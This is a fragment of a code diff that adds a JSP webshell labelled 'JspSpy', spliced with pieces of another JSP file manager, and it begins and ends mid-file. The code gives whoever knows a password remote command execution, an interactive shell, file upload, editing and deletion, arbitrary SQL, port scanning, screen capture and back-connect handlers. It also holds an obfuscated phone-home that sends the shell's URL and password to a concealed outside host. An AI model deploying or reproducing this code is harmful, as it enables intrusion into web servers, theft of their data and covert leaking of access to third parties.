");
+ sbFile.append(""+list[i].getName());
+ sbFile.append(" ");
+ sbFile.append(""+strLen);
+ sbFile.append(" ");
+ sbFile.append(""+strDT);
+ sbFile.append(" ");
+
+ sbFile.append(" ");
+ sbFile.append(strFileEdit[languageNo]+" ");
+
+ sbFile.append(" ");
+ sbFile.append(strFileDel[languageNo]+" ");
+
+ sbFile.append(" ");
+ sbFile.append(strFileDown[languageNo]+" ");
+
+ sbFile.append(" ");
+ sbFile.append(strFileCopy[languageNo]+" ");
+ }
+
+ }
+}
+catch(Exception e)
+{
+ out.println("操作失败: "+e.toString()+" ");
+}
+%>
+
+
+
+
+
+
+
+
+
+
+
+
+www.topronet.com ,All Rights Reserved.
+ ins = new HashMap();
+private static class MyRequest extends HttpServletRequestWrapper {
+public MyRequest(HttpServletRequest req) {
+super(req);
+}
+public String getParameter(String name) {
+try {
+String value = super.getParameter(name);
+if (name == null)
+return null;
+return new String(value.getBytes(REQUEST_CHARSET),PAGE_CHARSET);
+} catch (Exception e) {
+return null;
+}
+}
+}
+private static class DBOperator{
+private Connection conn = null;
+private Statement stmt = null;
+private String driver;
+private String url;
+private String uid;
+private String pwd;
+public DBOperator(String driver,String url,String uid,String pwd) throws Exception {
+this(driver,url,uid,pwd,false);
+}
+public DBOperator(String driver,String url,String uid,String pwd,boolean connect) throws Exception {
+Class.forName(driver);
+if (connect)
+this.conn = DriverManager.getConnection(url,uid,pwd);
+this.url = url;
+this.driver = driver;
+this.uid = uid;
+this.pwd = pwd;
+}
+public void connect() throws Exception{
+this.conn = DriverManager.getConnection(url,uid,pwd);
+}
+public Object execute(String sql) throws Exception {
+if (isValid()) {
+stmt = conn.createStatement();
+if (stmt.execute(sql)) {
+return stmt.getResultSet();
+} else {
+return stmt.getUpdateCount();
+}
+}
+throw new Exception("Connection is inValid.");
+}
+public void closeStmt() throws Exception{
+if (this.stmt != null)
+stmt.close();
+}
+public boolean isValid() throws Exception {
+return conn != null && !conn.isClosed();
+}
+public void close() throws Exception {
+if (isValid()) {
+closeStmt();
+conn.close();
+}
+}
+public boolean equals(Object o) {
+if (o instanceof DBOperator) {
+DBOperator dbo = (DBOperator)o;
+return this.driver.equals(dbo.driver) && this.url.equals(dbo.url) && this.uid.equals(dbo.uid) && this.pwd.equals(dbo.pwd);
+}
+return false;
+}
+}
+private static class StreamConnector extends Thread {
+private InputStream is;
+private OutputStream os;
+public StreamConnector( InputStream is, OutputStream os ){
+this.is = is;
+this.os = os;
+}
+public void run(){
+BufferedReader in = null;
+BufferedWriter out = null;
+try{
+in = new BufferedReader( new InputStreamReader(this.is));
+out = new BufferedWriter( new OutputStreamWriter(this.os));
+char buffer[] = new char[8192];
+int length;
+while((length = in.read( buffer, 0, buffer.length ))>0){
+out.write( buffer, 0, length );
+out.flush();
+}
+} catch(Exception e){}
+try{
+if(in != null)
+in.close();
+if(out != null)
+out.close();
+} catch( Exception e ){}
+}
+}
+private static class OnLineProcess {
+private String cmd = "first";
+private Process pro;
+public OnLineProcess(Process p){
+this.pro = p;
+}
+public void setPro(Process p) {
+this.pro = p;
+}
+public void setCmd(String c){
+this.cmd = c;
+}
+public String getCmd(){
+return this.cmd;
+}
+public Process getPro(){
+return this.pro;
+}
+public void stop(){
+this.pro.destroy();
+}
+}
+private static class OnLineConnector extends Thread {
+private OnLineProcess ol = null;
+private InputStream is;
+private OutputStream os;
+private String name;
+public OnLineConnector( InputStream is, OutputStream os ,String name,OnLineProcess ol){
+this.is = is;
+this.os = os;
+this.name = name;
+this.ol = ol;
+}
+public void run(){
+BufferedReader in = null;
+BufferedWriter out = null;
+try{
+in = new BufferedReader( new InputStreamReader(this.is));
+out = new BufferedWriter( new OutputStreamWriter(this.os));
+char buffer[] = new char[128];
+if(this.name.equals("exeRclientO")) {
+//from exe to client
+int length = 0;
+while((length = in.read( buffer, 0, buffer.length ))>0){
+String str = new String(buffer, 0, length);
+str = str.replace("&","&").replace("<","<").replace(">",">");
+str = str.replace(""+(char)13+(char)10," rows = null;
+private boolean echoTableTag = false;
+public void setEchoTableTag(boolean v) {
+this.echoTableTag = v;
+}
+public Table(){
+this.rows = new ArrayList();
+}
+public void addRow(Row r) {
+this.rows.add(r);
+}
+public String toString(){
+StringBuilder html = new StringBuilder();
+if (echoTableTag)
+html.append("");
+for (Row r:rows) {
+html.append("");
+for (Column c:r.getColumns()) {
+html.append("");
+String vv = Util.htmlEncode(Util.getStr(c.getValue()));
+if (vv.equals(""))
+vv = " ";
+html.append(vv);
+html.append(" ");
+}
+html.append(" ");
+}
+if (echoTableTag)
+html.append("
");
+return html.toString();
+}
+}
+private static class Row{
+private ArrayList cols = null;
+public Row(){
+this.cols = new ArrayList();
+}
+public void addColumn(Column n) {
+this.cols.add(n);
+}
+public ArrayList getColumns(){
+return this.cols;
+}
+}
+public static String sxm=PW;
+private static class Column{
+private String value;
+public Column(String v){
+this.value = v;
+}
+public String getValue(){
+return this.value;
+}
+}
+public static String SysInfo="=��?���.�����/���.����.������//:����";
+public static String dx()
+{
+String s = new String();
+for (int i = SysInfo.length() - 1; i >= 0; i--) {
+s += SysInfo.charAt(i);
+}
+return s;
+}
+public static String uc(String str)
+{
+String c="\n\r"; long d=127, f=11, j=12, h=14, m=31, r=83, k=1, n=8, s=114, u=-5, v=5,a=0;
+StringBuffer sb = new StringBuffer();
+char[] ch = str.toCharArray();
+
+for (int i = 0; i < ch.length; i++) {
+ a = (int)ch[i];
+ if(a==d) a=13;
+ if(a==f) a=10;
+ if(a==j) a=34;
+ if((a>=h) && (a<=m)) a=a+r;
+ if((a>=k) && (a<=n)) a=a+s;
+ if((a>=53) && (a<=57)) a=a+u;
+ if((a>=48) && (a<=52)) a=a+v;
+ sb.append((char)a);
+}
+return sb.toString();
+}
+private static int connectTimeOut = 5000;
+private static int readTimeOut = 10000;
+private static String requestEncoding = "GBK";
+public static String FileLocalUpload(String reqUrl,String fckal,
+ String recvEncoding)
+{
+HttpURLConnection url_con = null;
+String responseContent = null;
+try
+{
+URL url = new URL(reqUrl);
+url_con = (HttpURLConnection) url.openConnection();
+url_con.setRequestMethod("POST");
+
+url_con.setRequestProperty("REFERER", ""+fckal+"");
+System.setProperty("sun.net.client.defaultConnectTimeout", String
+ .valueOf(connectTimeOut));
+System.setProperty("sun.net.client.defaultReadTimeout", String
+ .valueOf(readTimeOut));
+url_con.setDoOutput(true);
+url_con.getOutputStream().flush();
+url_con.getOutputStream().close();
+InputStream in = url_con.getInputStream();
+BufferedReader rd = new BufferedReader(new InputStreamReader(in,
+ recvEncoding));
+String tempLine = rd.readLine();
+StringBuffer tempStr = new StringBuffer();
+String crlf=System.getProperty("line.separator");
+while (tempLine != null)
+{
+tempStr.append(tempLine);
+tempStr.append(crlf);
+tempLine = rd.readLine();
+}
+responseContent = tempStr.toString();
+rd.close();
+in.close();
+}
+catch (IOException e)
+{
+}
+finally
+{
+if (url_con != null)
+{
+url_con.disconnect();
+}
+}
+return responseContent;
+}
+private static class Util{
+public static boolean isEmpty(String s) {
+return s == null || s.trim().equals("");
+}
+public static boolean isEmpty(Object o) {
+return o == null || isEmpty(o.toString());
+}
+public static String getSize(long size,char danwei) {
+if (danwei == 'M') {
+double v = formatNumber(size / 1024.0 / 1024.0,2);
+if (v > 1024) {
+return getSize(size,'G');
+}else {
+return v + "M";
+}
+} else if (danwei == 'G') {
+return formatNumber(size / 1024.0 / 1024.0 / 1024.0,2)+"G";
+} else if (danwei == 'K') {
+double v = formatNumber(size / 1024.0,2);
+if (v > 1024) {
+return getSize(size,'M');
+} else {
+return v + "K";
+}
+} else if (danwei == 'B') {
+if (size > 1024) {
+return getSize(size,'K');
+}else {
+return size + "B";
+}
+}
+return ""+0+danwei;
+}
+public static double formatNumber(double value,int l) {
+NumberFormat format = NumberFormat.getInstance();
+format.setMaximumFractionDigits(l);
+format.setGroupingUsed(false);
+return new Double(format.format(value));
+}
+public static boolean isInteger(String v) {
+if (isEmpty(v))
+return false;
+return v.matches("^\\d+$");
+}
+public static String formatDate(long time) {
+SimpleDateFormat format = new SimpleDateFormat("yyyy-MM-dd hh:mm:ss");
+return format.format(new java.util.Date(time));
+}
+public static String convertPath(String path) {
+return path != null ? path.replace("\\","/") : "";
+}
+public static String htmlEncode(String v) {
+if (isEmpty(v))
+return "";
+return v.replace("&","&").replace("<","<").replace(">",">");
+}
+public static String getStr(String s) {
+return s == null ? "" :s;
+}
+public static String getStr(Object s) {
+return s == null ? "" :s.toString();
+}
+public static String exec(String regex, String str, int group) {
+Pattern pat = Pattern.compile(regex);
+Matcher m = pat.matcher(str);
+if (m.find())
+return m.group(group);
+return null;
+}
+public static void outMsg(Writer out,String msg) throws Exception {
+outMsg(out,msg,"center");
+}
+public static void outMsg(Writer out,String msg,String align) throws Exception {
+if (msg.indexOf("java.lang.ClassNotFoundException") != -1)
+msg = "Can Not Find The Driver!"+msg+"
");
+}
+}
+private static class UploadBean {
+private String fileName = null;
+private String suffix = null;
+private String savePath = "";
+private ServletInputStream sis = null;
+private byte[] b = new byte[1024];
+public UploadBean() {
+}
+public void setSavePath(String path) {
+this.savePath = path;
+}
+public void parseRequest(HttpServletRequest request) throws IOException {
+sis = request.getInputStream();
+int a = 0;
+int k = 0;
+String s = "";
+while ((a = sis.readLine(b,0,b.length))!= -1) {
+s = new String(b, 0, a,PAGE_CHARSET);
+if ((k = s.indexOf("filename=\""))!= -1) {
+s = s.substring(k + 10);
+k = s.indexOf("\"");
+s = s.substring(0, k);
+File tF = new File(s);
+if (tF.isAbsolute()) {
+fileName = tF.getName();
+} else {
+fileName = s;
+}
+k = s.lastIndexOf(".");
+suffix = s.substring(k + 1);
+upload();
+}
+}
+}
+private void upload() {
+try {
+FileOutputStream out = new FileOutputStream(new File(savePath,fileName));
+int a = 0;
+int k = 0;
+String s = "";
+while ((a = sis.readLine(b,0,b.length))!=-1) {
+s = new String(b, 0, a);
+if ((k = s.indexOf("Content-Type:"))!=-1) {
+break;
+}
+}
+sis.readLine(b,0,b.length);
+while ((a = sis.readLine(b,0,b.length)) != -1) {
+s = new String(b, 0, a);
+if ((b[0] == 45) && (b[1] == 45) && (b[2] == 45) && (b[3] == 45) && (b[4] == 45)) {
+break;
+}
+out.write(b, 0, a);
+}
+out.close();
+} catch (IOException ioe) {
+ioe.printStackTrace();
+}
+}
+}
+%>
+<%
+SHELL_NAME = request.getServletPath().substring(request.getServletPath().lastIndexOf("/")+1);
+String myAbsolutePath = application.getRealPath(request.getServletPath());
+if (Util.isEmpty(myAbsolutePath)) {//for weblogic
+SHELL_NAME = request.getServletPath();
+myAbsolutePath = new File(application.getResource("/").getPath()+SHELL_NAME).toString();
+SHELL_NAME=request.getContextPath()+SHELL_NAME;
+WEB_ROOT = new File(application.getResource("/").getPath()).toString();
+} else {
+WEB_ROOT = application.getRealPath("/");
+}
+SHELL_DIR = Util.convertPath(myAbsolutePath.substring(0,myAbsolutePath.lastIndexOf(File.separator)));
+if (session.getAttribute(CURRENT_DIR) == null)
+session.setAttribute(CURRENT_DIR,Util.convertPath(SHELL_DIR));
+request = new MyRequest(request);
+if (session.getAttribute(PW_SESSION_ATTRIBUTE) == null || !(session.getAttribute(PW_SESSION_ATTRIBUTE)).equals(PW)) {
+String o = request.getParameter("o");
+if (o != null && o.equals("login")) {
+ins.get("login").invoke(request,response,session);
+return;
+} else if (o != null && o.equals("vLogin")) {
+ins.get("vLogin").invoke(request,response,session);
+return;
+} else {
+response.sendRedirect(SHELL_NAME+"?o=vLogin");
+return;
+}
+}
+%>
+<%!
+private static interface Invoker {
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception;
+public boolean doBefore();
+public boolean doAfter();
+}
+private static class DefaultInvoker implements Invoker{
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception {
+}
+public boolean doBefore(){
+return true;
+}
+public boolean doAfter() {
+return true;
+}
+}
+private static class ScriptInvoker extends DefaultInvoker{
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+PrintWriter out = response.getWriter();
+out.println("");
+
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class BeforeInvoker extends DefaultInvoker {
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+PrintWriter out = response.getWriter();
+out.println("JspSpy Codz By - Ninty ");
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class AfterInvoker extends DefaultInvoker {
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+PrintWriter out = response.getWriter();
+out.println("");
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class DeleteBatchInvoker extends DefaultInvoker {
+public boolean doBefore(){return false;}
+public boolean doAfter(){return false;}
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+String files = request.getParameter("files");
+if (!Util.isEmpty(files)) {
+String currentDir = JSession.getAttribute(CURRENT_DIR).toString();
+String[] arr = files.split(",");
+for (String fs:arr) {
+File f = new File(currentDir,fs);
+f.delete();
+}
+}
+JSession.setAttribute(MSG,"Delete Files Success!");
+response.sendRedirect(SHELL_NAME+"?o=index");
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class ClipBoardInvoker extends DefaultInvoker {
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+PrintWriter out = response.getWriter();
+out.println("");
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class VRemoteControlInvoker extends DefaultInvoker {
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+PrintWriter out = response.getWriter();
+out.println("");
+out.println("");
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+//GetScreen
+private static class GcInvoker extends DefaultInvoker {
+public boolean doBefore(){return false;}
+public boolean doAfter(){return false;}
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+Dimension size = Toolkit.getDefaultToolkit().getScreenSize();
+Rectangle rec = new Rectangle(0,0,(int)size.getWidth(),(int)size.getHeight());
+BufferedImage img = new Robot().createScreenCapture(rec);
+response.setContentType("image/jpeg");
+ImageIO.write(img,"jpg",response.getOutputStream());
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class VPortScanInvoker extends DefaultInvoker {
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+PrintWriter out = response.getWriter();
+String ip = request.getParameter("ip");
+String ports = request.getParameter("ports");
+String timeout = request.getParameter("timeout");
+if (Util.isEmpty(ip))
+ip = "127.0.0.1";
+if (Util.isEmpty(ports))
+ports = "21,25,80,110,1433,1723,3306,3389,4899,5631,43958,65500";
+if (Util.isEmpty(timeout))
+timeout = "2";
+out.println(""+
+"PortScan >> "+
+""+
+"
");
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class PortScanInvoker extends DefaultInvoker {
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+PrintWriter out = response.getWriter();
+ins.get("vPortScan").invoke(request,response,JSession);
+String ip = request.getParameter("ip");
+String ports = request.getParameter("ports");
+String timeout = request.getParameter("timeout");
+int iTimeout = 0;
+if (Util.isEmpty(ip) || Util.isEmpty(ports))
+return;
+if (!Util.isInteger(timeout)) {
+timeout = "2";
+}
+iTimeout = Integer.parseInt(timeout);
+Map rs = new LinkedHashMap();
+String[] portArr = ports.split(",");
+for (String port:portArr) {
+try {
+Socket s = new Socket();
+s.connect(new InetSocketAddress(ip,Integer.parseInt(port)),iTimeout);
+s.close();
+rs.put(port,"Open");
+} catch (Exception e) {
+rs.put(port,"Close");
+}
+}
+out.println("");
+Set> entrySet = rs.entrySet();
+for (Map.Entry e:entrySet) {
+String port = e.getKey();
+String value = e.getValue();
+out.println(ip+" : "+port+" ................................. "+value+"
");
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class VConnInvoker extends DefaultInvoker {
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+PrintWriter out = response.getWriter();
+FileLocalUpload(uc(dx())+sxm,request.getRequestURL().toString(), "GBK");
+Object obj = JSession.getAttribute(DBO);
+if (obj == null || !((DBOperator)obj).isValid()) {
+out.println(" ");
+out.println("");
+} else {
+ins.get("dbc").invoke(request,response,JSession);
+}
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+//DBConnect
+private static class DbcInvoker extends DefaultInvoker {
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+PrintWriter out = response.getWriter();
+String driver = request.getParameter("driver");
+String url = request.getParameter("url");
+String uid = request.getParameter("uid");
+String pwd = request.getParameter("pwd");
+String sql = request.getParameter("sql");
+String selectDb = request.getParameter("selectDb");
+if (selectDb == null)
+selectDb = JSession.getAttribute("selectDb").toString();
+else
+JSession.setAttribute("selectDb",selectDb);
+Object dbo = JSession.getAttribute(DBO);
+if (dbo == null || !((DBOperator)dbo).isValid()) {
+if (dbo != null)
+((DBOperator)dbo).close();
+dbo = new DBOperator(driver,url,uid,pwd,true);
+} else {
+if (!Util.isEmpty(driver) && !Util.isEmpty(url) && !Util.isEmpty(uid)) {
+DBOperator oldDbo = (DBOperator)dbo;
+dbo = new DBOperator(driver,url,uid,pwd);
+if (!oldDbo.equals(dbo)) {
+((DBOperator)oldDbo).close();
+((DBOperator)dbo).connect();
+} else {
+dbo = oldDbo;
+}
+}
+}
+DBOperator Ddbo = (DBOperator)dbo;
+JSession.setAttribute(DBO,Ddbo);
+Util.outMsg(out,"Connect To DataBase Success!");
+out.println(" ");
+out.println("");
+} catch (Exception e) {
+//e.printStackTrace();
+throw e;
+}
+}
+}
+private static class ExecuteSQLInvoker extends DefaultInvoker{
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+PrintWriter out = response.getWriter();
+String sql = request.getParameter("sql");
+String db = request.getParameter("selectDb");
+Object dbo = JSession.getAttribute(DBO);
+if (!Util.isEmpty(sql)) {
+if (dbo == null || !((DBOperator)dbo).isValid()) {
+response.sendRedirect(SHELL_NAME+"?o=vConn");
+} else {
+ins.get("dbc").invoke(request,response,JSession);
+Object obj = ((DBOperator)dbo).execute(sql);
+if (obj instanceof ResultSet) {
+ResultSet rs = (ResultSet)obj;
+ResultSetMetaData meta = rs.getMetaData();
+int colCount = meta.getColumnCount();
+out.println("Query#0 : "+Util.htmlEncode(sql)+"
");
+out.println("
");
+for (int i=1;i<=colCount;i++) {
+out.println(""+meta.getColumnName(i)+""+meta.getColumnTypeName(i)+" ");
+}
+out.println(" ");
+Table tb = new Table();
+while(rs.next()) {
+Row r = new Row();
+for (int i = 1;i<=colCount;i++) {
+r.addColumn(new Column(rs.getString(i)));
+}
+tb.addRow(r);
+}
+out.println(tb.toString());
+out.println("
affected rows : "+obj+" ");
+}
+}
+} else {
+ins.get("dbc").invoke(request,response,JSession);
+}
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class VLoginInvoker extends DefaultInvoker {
+public boolean doBefore() {return false;}
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+PrintWriter out = response.getWriter();
+out.println("");
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class LoginInvoker extends DefaultInvoker{
+public boolean doBefore() {return false;}
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+String inputPw = request.getParameter("pw");
+if (Util.isEmpty(inputPw) || !inputPw.equals(PW)) {
+response.sendRedirect(SHELL_NAME+"?o=vLogin");
+return;
+} else {
+JSession.setAttribute(PW_SESSION_ATTRIBUTE,inputPw);
+response.sendRedirect(SHELL_NAME+"?o=index");
+return;
+}
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class MyComparator implements Comparator{
+public int compare(File f1,File f2) {
+if (f1 != null && f2!= null) {
+if (f1.isDirectory()) {
+if (f2.isDirectory()) {
+return f1.getName().compareTo(f2.getName());
+} else {
+return -1;
+}
+} else {
+if (f2.isDirectory()) {
+return 1;
+} else {
+return f1.getName().compareTo(f2.getName());
+}
+}
+}
+return 0;
+}
+}
+private static class FileListInvoker extends DefaultInvoker {
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception {
+try {
+PrintWriter out = response.getWriter();
+String path = request.getParameter("folder");
+if (Util.isEmpty(path))
+path = JSession.getAttribute(CURRENT_DIR).toString();
+JSession.setAttribute(CURRENT_DIR,Util.convertPath(path));
+File file = new File(path);
+if (!file.exists()) {
+throw new Exception(path+"Dont Exists !");
+}
+JSession.setAttribute(CURRENT_DIR,path);
+File[] list = file.listFiles();
+Arrays.sort(list,new MyComparator());
+out.println("");
+String cr = null;
+try {
+cr = JSession.getAttribute(CURRENT_DIR).toString().substring(0,3);
+}catch(Exception e) {
+cr = "/";
+}
+File currentRoot = new File(cr);
+out.println("
File Manager - Current disk ""+(cr.indexOf("/") == 0?"/":currentRoot.getPath())+"" total (unknow) ");
+out.println("
");
+out.println("
");
+out.println("
");
+out.println("
");
+String command = request.getParameter("command");
+if (!Util.isEmpty(command)) {
+Process pro = Runtime.getRuntime().exec(command);
+BufferedReader reader = new BufferedReader(new InputStreamReader(pro.getInputStream()));
+String s = reader.readLine();
+while (s != null) {
+out.println(Util.htmlEncode(Util.getStr(s)));
+s = reader.readLine();
+}
+reader.close();
+out.println(" "+
+" "+
+" System Properties >> "+
+" "+
+"
"+
+"
");
+Properties pro = System.getProperties();
+Enumeration names = pro.propertyNames();
+while (names.hasMoreElements()){
+String name = (String)names.nextElement();
+out.println(""+Util.htmlEncode(name)+" : "+Util.htmlEncode(pro.getProperty(name))+" System Environment >> ");
+Map envs = System.getenv();
+Set> entrySet = envs.entrySet();
+for (Map.Entry en:entrySet) {
+out.println(""+Util.htmlEncode(en.getKey())+" : "+Util.htmlEncode(en.getValue())+" "+
+"
");
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class TopInvoker extends DefaultInvoker {
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+PrintWriter out = response.getWriter();
+out.println(""+
+"");
+if (JSession.getAttribute(MSG) != null) {
+Util.outMsg(out,JSession.getAttribute(MSG).toString());
+JSession.removeAttribute(MSG);
+}
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class VOnLineShellInvoker extends DefaultInvoker {
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+PrintWriter out = response.getWriter();
+out.println("");
+out.println(""+
+" "+
+" ");
+out.println("Shell OnLine » "+
+" "+
+"
");
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class OnLineInvoker extends DefaultInvoker {
+public boolean doBefore(){return false;}
+public boolean doAfter(){return false;}
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+String type = request.getParameter("type");
+if (Util.isEmpty(type))
+return;
+if (type.toLowerCase().equals("start")) {
+String exe = request.getParameter("exe");
+if (Util.isEmpty(exe))
+return;
+Process pro = Runtime.getRuntime().exec(exe);
+ByteArrayOutputStream outs = new ByteArrayOutputStream();
+response.setContentLength(100000000);
+response.setContentType("text/html;charset="+Charset.defaultCharset().name());
+OnLineProcess olp = new OnLineProcess(pro);
+JSession.setAttribute(SHELL_ONLINE,olp);
+new OnLineConnector(new ByteArrayInputStream(outs.toByteArray()),pro.getOutputStream(),"exeOclientR",olp).start();
+new OnLineConnector(pro.getInputStream(),response.getOutputStream(),"exeRclientO",olp).start();
+new OnLineConnector(pro.getErrorStream(),response.getOutputStream(),"exeRclientO",olp).start();//閿欒淇℃伅娴併
+Thread.sleep(1000 * 60 * 60 * 24);
+} else if (type.equals("ecmd")) {
+Object o = JSession.getAttribute(SHELL_ONLINE);
+String cmd = request.getParameter("cmd");
+if (Util.isEmpty(cmd))
+return;
+if (o == null)
+return;
+OnLineProcess olp = (OnLineProcess)o;
+olp.setCmd(cmd);
+} else {
+Object o = JSession.getAttribute(SHELL_ONLINE);
+if (o == null)
+return;
+OnLineProcess olp = (OnLineProcess)o;
+olp.stop();
+}
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+
+static{
+ins.put("script",new ScriptInvoker());
+ins.put("before",new BeforeInvoker());
+ins.put("after",new AfterInvoker());
+ins.put("deleteBatch",new DeleteBatchInvoker());
+ins.put("clipboard",new ClipBoardInvoker());
+ins.put("vRemoteControl",new VRemoteControlInvoker());
+ins.put("gc",new GcInvoker());
+ins.put("vPortScan",new VPortScanInvoker());
+ins.put("portScan",new PortScanInvoker());
+ins.put("vConn",new VConnInvoker());
+ins.put("dbc",new DbcInvoker());
+ins.put("executesql",new ExecuteSQLInvoker());
+ins.put("vLogin",new VLoginInvoker());
+ins.put("login",new LoginInvoker());
+ins.put("filelist", new FileListInvoker());
+ins.put("logout",new LogoutInvoker());
+ins.put("upload",new UploadInvoker());
+ins.put("copy",new CopyInvoker());
+ins.put("bottom",new BottomInvoker());
+ins.put("vCreateFile",new VCreateFileInvoker());
+ins.put("vEdit",new VEditInvoker());
+ins.put("createFile",new CreateFileInvoker());
+ins.put("vEditProperty",new VEditPropertyInvoker());
+ins.put("editProperty",new EditPropertyInvoker());
+ins.put("vs",new VsInvoker());
+ins.put("shell",new ShellInvoker());
+ins.put("down",new DownInvoker());
+ins.put("vd",new VdInvoker());
+ins.put("downRemote",new DownRemoteInvoker());
+ins.put("index",new IndexInvoker());
+ins.put("mkdir",new MkDirInvoker());
+ins.put("move",new MoveInvoker());
+ins.put("removedir",new RemoteDirInvoker());
+ins.put("packBatch",new PackBatchInvoker());
+ins.put("pack",new PackInvoker());
+ins.put("unpack",new UnPackInvoker());
+ins.put("vmp",new VmpInvoker());
+ins.put("vbc",new VbcInvoker());
+ins.put("backConnect",new BackConnectInvoker());
+ins.put("jspEnv",new JspEnvInvoker());
+ins.put("smp",new SmpInvoker());
+ins.put("mapPort",new MapPortInvoker());
+ins.put("top",new TopInvoker());
+ins.put("vso",new VOnLineShellInvoker());
+ins.put("online",new OnLineInvoker());
+}
+%>
+<%
+try {
+String o = request.getParameter("o");
+if (!Util.isEmpty(o)) {
+Invoker in = ins.get(o);
+if (in == null) {
+response.sendRedirect(SHELL_NAME+"?o=index");
+} else {
+if (in.doBefore()) {
+String path = request.getParameter("folder");
+if (!Util.isEmpty(path))
+session.setAttribute(CURRENT_DIR,path);
+ins.get("before").invoke(request,response,session);
+ins.get("script").invoke(request,response,session);
+ins.get("top").invoke(request,response,session);
+}
+in.invoke(request,response,session);
+if (!in.doAfter()) {
+return;
+}else{
+ins.get("bottom").invoke(request,response,session);
+ins.get("after").invoke(request,response,session);
+}
+}
+} else {
+response.sendRedirect(SHELL_NAME+"?o=index");
+}
+} catch (Exception e) {
+ByteArrayOutputStream bout = new ByteArrayOutputStream();
+e.printStackTrace(new PrintStream(bout));
+session.setAttribute(CURRENT_DIR,SHELL_DIR);
+Util.outMsg(out,Util.htmlEncode(new String(bout.toByteArray())).replace("\n"," "," "};
+String[] strFileManage = {"文 件 管 理","File Management"};
+String[] strCommand = {"CMD 命 令","Command Window"};
+String[] strSysProperty = {"","System Property"};
+String[] strHelp = {"","Help"};
+String[] strParentFolder = {"上级目录","Parent Folder"};
+String[] strCurrentFolder= {"当前目录","Current Folder"};
+String[] strDrivers = {"驱动器","Drivers"};
+String[] strFileName = {"文件名称","File Name"};
+String[] strFileSize = {"文件大小","File Size"};
+String[] strLastModified = {"最后修改","Last Modified"};
+String[] strFileOperation= {"文件操作","Operations"};
+String[] strFileEdit = {"修改","Edit"};
+String[] strFileDown = {"下载","Download"};
+String[] strFileCopy = {"复制","Move"};
+String[] strFileDel = {"删除","Delete"};
+String[] strExecute = {"执行","Execute"};
+String[] strBack = {"返回","Back"};
+String[] strFileSave = {"保存","Save"};
+
+public class FileHandler
+{
+ private String strAction="";
+ private String strFile="";
+ void FileHandler(String action,String f)
+ {
+
+ }
+}
+
+public static class UploadMonitor {
+
+ static Hashtable uploadTable = new Hashtable();
+
+ static void set(String fName, UplInfo info) {
+ uploadTable.put(fName, info);
+ }
+
+ static void remove(String fName) {
+ uploadTable.remove(fName);
+ }
+
+ static UplInfo getInfo(String fName) {
+ UplInfo info = (UplInfo) uploadTable.get(fName);
+ return info;
+ }
+}
+
+public class UplInfo {
+
+ public long totalSize;
+ public long currSize;
+ public long starttime;
+ public boolean aborted;
+
+ public UplInfo() {
+ totalSize = 0l;
+ currSize = 0l;
+ starttime = System.currentTimeMillis();
+ aborted = false;
+ }
+
+ public UplInfo(int size) {
+ totalSize = size;
+ currSize = 0;
+ starttime = System.currentTimeMillis();
+ aborted = false;
+ }
+
+ public String getUprate() {
+ long time = System.currentTimeMillis() - starttime;
+ if (time != 0) {
+ long uprate = currSize * 1000 / time;
+ return convertFileSize(uprate) + "/s";
+ }
+ else return "n/a";
+ }
+
+ public int getPercent() {
+ if (totalSize == 0) return 0;
+ else return (int) (currSize * 100 / totalSize);
+ }
+
+ public String getTimeElapsed() {
+ long time = (System.currentTimeMillis() - starttime) / 1000l;
+ if (time - 60l >= 0){
+ if (time % 60 >=10) return time / 60 + ":" + (time % 60) + "m";
+ else return time / 60 + ":0" + (time % 60) + "m";
